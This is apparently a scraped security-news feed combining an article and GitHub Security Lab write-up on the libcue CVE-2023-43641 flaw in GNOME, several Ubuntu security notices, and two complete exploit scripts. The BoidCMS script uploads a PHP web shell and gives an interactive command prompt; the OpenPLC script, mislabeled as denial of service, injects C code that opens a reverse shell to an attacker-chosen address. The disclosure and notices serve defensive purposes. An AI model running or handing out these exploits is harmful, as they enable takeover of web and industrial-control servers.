An overlooked library contains a vulnerability that could enable full remote takeover simply by clicking a link.

Researchers have uncovered a vulnerability in a library within the GNOME desktop environment for Linux systems. If embedded in a malicious link, it could enable attackers to perform machine takeover in an instant.

GNOME — short for GNU Object Model Environment — is an open source desktop environment implemented by popular Linux distributions like Ubuntu and Fedora.

According to a new blog from the GitHub Security Lab, within one of GNOME's default applications is a dependency containing a "High" 8.8 out of 10-rated, out-of-bounds array access vulnerability. Because of how the application works, all an attacker would need is one click from a victim in order to execute arbitrary code on a GNOME OS.

It "underscores a critical business risk," says Igor Volovich, VP of compliance strategy at Qmulos. "For businesses, this is a stark reminder that a single vulnerability, even in seemingly benign software components, can be leveraged for wide-scale compromise, especially when these components are interconnected within larger systems or platforms."

**A Bug in a Dependency, App, Environment, or OS**

The new vulnerability — CVE-2023-43641 — isn't with Linux or GNOME, at least directly.

The issue, rather, lies in "libcue," an obscure library with just nine forks on GitHub. libcue is used to parse "cue sheets," a metadata format for describing the layout of tracks on a CD or DVD.

Among other projects, libcue is used by "tracker-miners," a default application in GNOME used for indexing files in the home directory. Of note in this case is that tracker-miners automatically updates when files are added or modified in certain subdirectories, for example the "~/Downloads" folder.

GitHub's researchers took advantage of this fact when designing an exploit for CVE-2023-43641. They wrote a malicious Web page which, when visited, triggers the download of a cue sheet (.cue) file. The file was saved to ~/Downloads, and tracker-miners automatically scanned it using libcue, enabling their code to run (in this case, simply opening a calculator app).

The researchers have successfully tested exploits for the most recent versions of Ubuntu and Fedora. They have also publicly released a harmless, six-line proof-of-concept.

**Implications for Linux Users**

The open source nature of Linux, its applications, libraries, and so on, are both a weakness and a strength where enterprise security is concerned.

"Its open-source nature invites vast community contributions, fostering innovation but also expanding its threat surface," Volovich points out. On one hand, "preparedness lies in the robustness of the Linux community, which is often quick to patch and remediate identified vulnerabilities. However, the sheer scale of Linux deployments and varied custom configurations means that vulnerabilities can persist unnoticed."

That one tiny syntax handling error in one minor component of one easily missed application can be shown to cause such significant consequences means that Linux users cannot be content with simply patching as needed, Volovich thinks. "While patching remains an essential reactive measure in the cybersecurity arsenal, a singular focus on it creates a game of perpetual catch-up. The continuously evolving threat landscape necessitates a shift in mindset."

"Rather than isolating specific vulnerabilities, it's more effective to approach security from a controls perspective. By doing so, organizations can identify and address potential weak spots before they're exploited," he says, pointing to frameworks and standards like NIST and ISO. "When enterprises embed these standards into their operations, they don't merely respond to threats; they anticipate them."

One-Click 'Gnome' Exploit Is a Supply Chain Risk for Linux OSes

Ubuntu Security Notice 6424-1 - It was discovered that kramdown did not restrict Rouge formatters to the correct namespace. An attacker could use this issue to cause kramdown to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6424-1October 10, 2023ruby-kramdown vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:kramdown could be made to execute arbitrary code if it received speciallycrafted input.Software Description:- ruby-kramdown: Fast, pure-Ruby Markdown-superset converter - ruby libraryDetails:It was discovered that kramdown did not restrict Rouge formatters to thecorrect namespace. An attacker could use this issue to cause kramdown toexecute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   ruby-kramdown                   1.17.0-4ubuntu0.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6424-1   CVE-2021-28834Package Information:   https://launchpad.net/ubuntu/+source/ruby-kramdown/1.17.0-4ubuntu0.2

Ubuntu Security Notice USN-6424-1

Ubuntu Security Notice 6423-1 - It was discovered that CUE incorrectly handled certain files. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6423-1  
October 09, 2023

libcue vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CUE could be made to execute arbitrary code if it received a specially  
crafted file.

Software Description:  
- libcue: CUE Sheet Parser Library - development files

Details:

It was discovered that CUE incorrectly handled certain files.  
An attacker could possibly use this issue to expose sensitive  
information or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libcue2                         2.2.1-4ubuntu0.1

Ubuntu 22.04 LTS:  
  libcue2                         2.2.1-3ubuntu0.1

Ubuntu 20.04 LTS:  
  libcue2                         2.2.1-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6423-1  
  CVE-2023-43641

Package Information:  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-4ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-3ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-2ubuntu0.1

Ubuntu Security Notice USN-6423-1

BoidCMS versions 2.0.0 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/python3# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability# Date: 08/21/2023# Exploit Author: 1337kid# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://boidcms.github.io/BoidCMS.zip# Version: <= 2.0.0# Tested on: Ubuntu# CVE : CVE-2023-38836import requestsimport reimport argparseparser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')parser.add_argument("-u", "--url", help="website url")parser.add_argument("-l", "--user", help="admin username")parser.add_argument("-p", "--passwd", help="admin password")args = parser.parse_args()base_url=args.urluser=args.userpasswd=args.passwddef showhelp():  print(parser.print_help())  exit()if base_url == None: showhelp()elif user == None: showhelp()elif passwd == None: showhelp()with requests.Session() as s:  req=s.get(f'{base_url}/admin')  token=re.findall('[a-z0-9]{64}',req.text)  form_login_data={    "username":user,    "password":passwd,    "login":"Login",  }  form_login_data['token']=token  s.post(f'{base_url}/admin',data=form_login_data)  #=========== File upload to RCE  req=s.get(f'{base_url}/admin?page=media')  token=re.findall('[a-z0-9]{64}',req.text)  form_upld_data={    "token":token,    "upload":"Upload"  }  #==== php shell  php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']  with open('shell.php','w') as f:    f.writelines(php_code)  #====  file = {'file' : open('shell.php','rb')}  s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)  req=s.get(f'{base_url}/media/shell.php')  if req.status_code == '404':    print("Upload failed")    exit()  print(f'Shell uploaded to "{base_url}/media/shell.php"')  while 1:    cmd=input("cmd >> ")    if cmd=='exit': exit()    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})    print(req.text)

BoidCMS 2.0.0 Shell Upload

Ubuntu Security Notice 6422-1 - It was discovered that Ring incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to execute arbitrary code. It was discovered that Ring incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6422-1October 09, 2023ring vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Ring.Software Description:- ring: Secure and distributed voice, video, and chat platformDetails:It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to execute arbitrary code.(CVE-2021-37706)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.(CVE-2021-43299, CVE-2021-43300, CVE-2021-43301, CVE-2021-43302,CVE-2021-43303, CVE-2021-43804, CVE-2021-43845, CVE-2022-21723,CVE-2022-23537, CVE-2022-23547, CVE-2022-23608, CVE-2022-24754,CVE-2022-24763, CVE-2022-24764, CVE-2022-24793, CVE-2022-31031,CVE-2022-39244)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.This issue only affected Ubuntu 20.04 LTS. (CVE-2022-21722)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.(CVE-2023-27585)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   jami                            20230206.0~ds1-5ubuntu0.1   jami-daemon                     20230206.0~ds1-5ubuntu0.1Ubuntu 20.04 LTS:   jami                            20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   jami-daemon                     20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   ring                            20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   ring-daemon                     20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   ring                            20180228.1.503da2b~ds1-1ubuntu0.1~esm1   ring-daemon                     20180228.1.503da2b~ds1-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6422-1   CVE-2021-37706, CVE-2021-43299, CVE-2021-43300, CVE-2021-43301,   CVE-2021-43302, CVE-2021-43303, CVE-2021-43804, CVE-2021-43845,   CVE-2022-21722, CVE-2022-21723, CVE-2022-23537, CVE-2022-23547,   CVE-2022-23608, CVE-2022-24754, CVE-2022-24763, CVE-2022-24764,   CVE-2022-24793, CVE-2022-31031, CVE-2022-39244, CVE-2023-27585Package Information:   https://launchpad.net/ubuntu/+source/ring/20230206.0~ds1-5ubuntu0.1 https://launchpad.net/ubuntu/+source/ring/20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1

Ubuntu Security Notice USN-6422-1

OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

libcue provides an API for parsing and extracting data from CUE sheets. Versions 2.2.1 and prior are vulnerable to out-of-bounds array access. A user of the GNOME desktop environment can be exploited by downloading a cue sheet from a malicious webpage. Because the file is saved to `~/Downloads`, it is then automatically scanned by tracker-miners. And because it has a .cue filename extension, tracker-miners use libcue to parse the file. The file exploits the vulnerability in libcue to gain code execution.

Today, in coordination with Ilya Lipnitskiy (the maintainer of libcue) and the distros mailing list, the GitHub Security Lab is disclosing CVE-2023-43641, a memory corruption vulnerability in libcue. We have also sent a text-only version of this blog post to the oss-security list.

It’s quite likely that you have never heard of libcue before, and are wondering why it’s important. This situation is neatly illustrated by xkcd 2347:

libcue is a library used for parsing cue sheets—a metadata format for describing the layout of the tracks on a CD. Cue sheets are often used in combination with the FLAC audio file format, which means that libcue is a dependency of some audio players, such as Audacious. But the reason why I decided to audit libcue for security vulnerabilities is that it’s used by tracker-miners: an application that’s included with GNOME—the default graphical desktop environment of many open source operating systems.1 The purpose of tracker-miners is to index the files in your home directory to make them easily searchable. For example, the index is used by this search bar:

The index is automatically updated when you add or modify a file in certain subdirectories of your home directory, in particular including ~/Downloads. To make a long story short, that means that inadvertently clicking a malicious link is all it takes for an attacker to exploit CVE-2023-43641 and get code execution on your computer:

https://github.blog/wp-content/uploads/2023/10/CVE-2023-43641-poc.mp4

The video shows me clicking a link in a webpage2, which causes a cue sheet to be downloaded. Because the file is saved to ~/Downloads, it is then automatically scanned by tracker-miners. And because it has a .cue filename extension, tracker-miners uses libcue to parse the file. The file exploits the vulnerability in libcue to gain code execution and pop a calculator. Cue sheets are just one of many file formats supported by tracker-miners. For example, it also includes scanners for HTML, JPEG, and PDF.

I am delaying publication of the proof of concept (PoC) used in the video, to give users time to install the patch. But if you’d like to test if your system is vulnerable, try downloading this file, which contains a much simpler version of the PoC that merely causes a (benign) crash.

The offsets in the full PoC need to be tuned for different distributions. I have _only_ done this for Ubuntu 23.04 and Fedora 38, the most recent releases of Ubuntu and Fedora at this time. In my testing, I have found that the PoC works very reliably when run on the correct distribution (and will trigger a SIGSEGV when run on the wrong distribution). I have not created PoCs for any other distributions, but I believe that all distributions that run GNOME are potentially exploitable.

**The bug in libcue**

libcue is quite a small project. It’s primarily a bison grammar for cue sheets, with a few data structures for storing the parsed data. A simple example of a cue sheet looks like this:

    REM GENRE "Pop, dance pop"
    REM DATE 1987
    PERFORMER "Rick Astley"
    TITLE "Whenever You Need Somebody"
    FILE "Whenever You Need Somebody.mp3" MP3
      TRACK 01 AUDIO
        TITLE "Never Gonna Give You Up"
        PERFORMER "Rick Astley"
        SONGWRITER "Mike Stock, Matt Aitken, Pete Waterman"
        INDEX 01 00:00:00
      TRACK 02 AUDIO
        TITLE "Whenever You Need Somebody"
        PERFORMER "Rick Astley"
        SONGWRITER "Mike Stock, Matt Aitken, Pete Waterman"
        INDEX 01 03:35:00
    

The vulnerability is in the handling of the INDEX syntax. Replacing one of those INDEX statements with this will trigger the bug:

    INDEX 4294567296 0
    

There are two parts to the problem. The first is that the scanner (cue\_scanner.l, line 132) uses atoi to scan the integers:

    [[:digit:]]+    { yylval.ival = atoi(yytext); return NUMBER; }
    

atoi does not check for integer overflow, so it is easy to construct a negative index. For example, 4294567296 is converted to -400000 by atoi.

The second part of the problem (and this is the actual vulnerability) is that track_set_index does not check that i ≥ 0:

    void track_set_index(Track *track, int i, long ind)
    {
        if (i > MAXINDEX) {
            fprintf(stderr, "too many indexes\n");
                    return;
        }
    
        track->index[i] = ind;
    }
    

If i is negative, then this code can write to an address outside the bounds of the array. Since the value of ind is also attacker-controlled, this is a very powerful vulnerability.

The bug is simple to fix by adding an extra condition to the if-statement in track_set_index. This is the proposed patch:

    diff --git a/cd.c b/cd.c
    index cf77a18..4bbea19 100644
    --- a/cd.c
    +++ b/cd.c
    @@ -339,7 +339,7 @@ track_get_rem(const Track* track)
    
     void track_set_index(Track *track, int i, long ind)
     {
    -       if (i > MAXINDEX) {
    +       if (i < 0 || i > MAXINDEX) {
                    fprintf(stderr, "too many indexes\n");
                    return;
            }
    

**More about tracker-miners**

I want to be clear that this bug is _not_ a vulnerability in tracker-miners. But I have focused on tracker-miners because it magnifies the impact of this bug due to the way that it automatically scans the files in your ~/Downloads directory.

tracker-miners consists of two processes:

1.  tracker-miner-fs
2.  tracker-extract

The first, tracker-miner-fs, is a background process which is always running, whereas the second, tracker-extract, is only started on demand to scan new files. tracker-miner-fs uses inotify to monitor specific directories, such as ~/Downloads, ~/Music, and ~/Videos. When a new file is created, it launches tracker-extract to scan the file. tracker-extract sends the results back to tracker-miner-fs (which maintains the index) and then usually shuts down again after a few seconds. The vulnerability only affects tracker-extract, because that’s where libcue is used. Both processes run as the current user, so this vulnerability would need to be chained with a separate privilege escalation vulnerability for an attacker to gain admin privileges.

The vulnerability will not trigger if tracker-miners is not running. To check if it is, I use the command ps aux | grep track. It usually shows that tracker-miner-fs is running and that tracker-extract isn’t. If _neither_ is running (which I think is rare), then using the search bar (press the “super” key and type something) should automatically restart tracker-miner-fs. As far as I know, tracker-miners is quite tightly integrated into GNOME, so there’s no easy way to switch it off. There’s certainly nothing like a simple checkbox in the settings dialog. There’s some discussion here about how to switch it off by modifying your systemd configuration.

The two-process architecture of tracker-miners is helpful for exploitation. Firstly, it’s much easier to predict the memory layout in a freshly started process than in one that’s already been running for hours, so the fact that tracker-extract is only started on-demand is very convenient. Even better, tracker-extract always creates a fresh thread to scan the downloaded file, and I’ve found that the heap layout in the thread’s malloc arena is _very_ consistent: it varies between distributions, so, for example, Ubuntu 23.04 has a slightly different layout than Fedora 38, but on the same distribution the layout is identical every single time. Secondly, because tracker-extract is restarted on demand, an attacker could potentially crash it many times until their exploit succeeds. Due to the consistency of the heap layout, I’ve found that my exploit works very reliably without needing to use this, but I could imagine an attacker loading a zip file with thousands of copies of their exploit to increase their chance of success when the victim unzips the download.

**tracker-miners seccomp sandbox escape**

The difficult part of exploiting this vulnerability was finding a way to bypass ASLR. But what I _didn’t_ realize when I started writing the PoC, is that tracker-extract also has a seccomp sandbox which is intended to prevent this kind of exploit from working. It was a nasty surprise when I thought I had all the pieces in place for a working PoC and it failed with the error message: Disallowed syscall "close_range" caught in sandbox. But I still failed to understand that I was attempting a sandbox escape here. I just thought I needed to take a different code path that didn’t use the close_range function. So I tried a different route, it worked, and I didn’t give it any more thought until the GNOME developers asked how I’d managed to escape the sandbox. It turned out that I’d discovered the escape entirely by accident: while I was working on the new route, I unwittingly made a change to the PoC that solved it. I have since discovered that I could have got the original PoC working with a one-line change. I’ll go into more detail on this in a follow-up blog post when I publish the PoC, but for now I’ll just mention that, in response to this, Carlos Garnacho has very quickly implemented some changes to strengthen the sandbox, which will prevent this exploitation path from working in the future.

**Conclusion**

Sometimes a vulnerability in a seemingly innocuous library can have a large impact. Due to the way that it’s used by tracker-miners, this vulnerability in libcue became a 1-click RCE. If you use GNOME, please update today!

I’m delaying the release of the full PoC to give users time to install the update, but planning to publish a follow-up blog post soon with details of how the full PoC works. Save an unpatched VM with Ubuntu 23.04 or Fedora 38 if you’d like to test the full PoC when I release it.

**Notes**

**Explore more from GitHub**

**Security**

Secure platform, secure data. Everything you need to make security your #1.

Learn more

**GitHub Universe 2023**

Get free virtual tickets to the global developer event for AI, security, and DevEx.

Get free tickets

**GitHub Copilot**

Don't fly solo. Try 30 days for free.

Learn more

**Work at GitHub!**

Check out our current job openings.

Learn more

**Subscribe to The GitHub Insider**

Discover tips, technical guides, and best practices in our monthly newsletter for developers.

CVE-2023-43641: Coordinated Disclosure: 1-Click RCE on GNOME (CVE-2023-43641)

Ubuntu Security Notice 6421-1 - It was discovered that Bind incorrectly handled certain control channel messages. A remote attacker with access to the control channel could possibly use this issue to cause Bind to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6421-1  
October 09, 2023

bind9 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Bind could be made to crash if it received specially crafted network   
traffic.

Software Description:  
- bind9: Internet Domain Name Server

Details:

It was discovered that Bind incorrectly handled certain control channel  
messages. A remote attacker with access to the control channel could  
possibly use this issue to cause Bind to crash, resulting in a denial of  
service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.11.3+dfsg-1ubuntu1.19+esm2  
   libbind9-160                    1:9.11.3+dfsg-1ubuntu1.19+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.10.3.dfsg.P4-8ubuntu1.19+esm7  
   libbind9-140  1:9.10.3.dfsg.P4-8ubuntu1.19+esm7

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.9.5.dfsg-3ubuntu0.19+esm11  
   libbind9-90                     1:9.9.5.dfsg-3ubuntu0.19+esm11

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6421-1  
   CVE-2023-3341

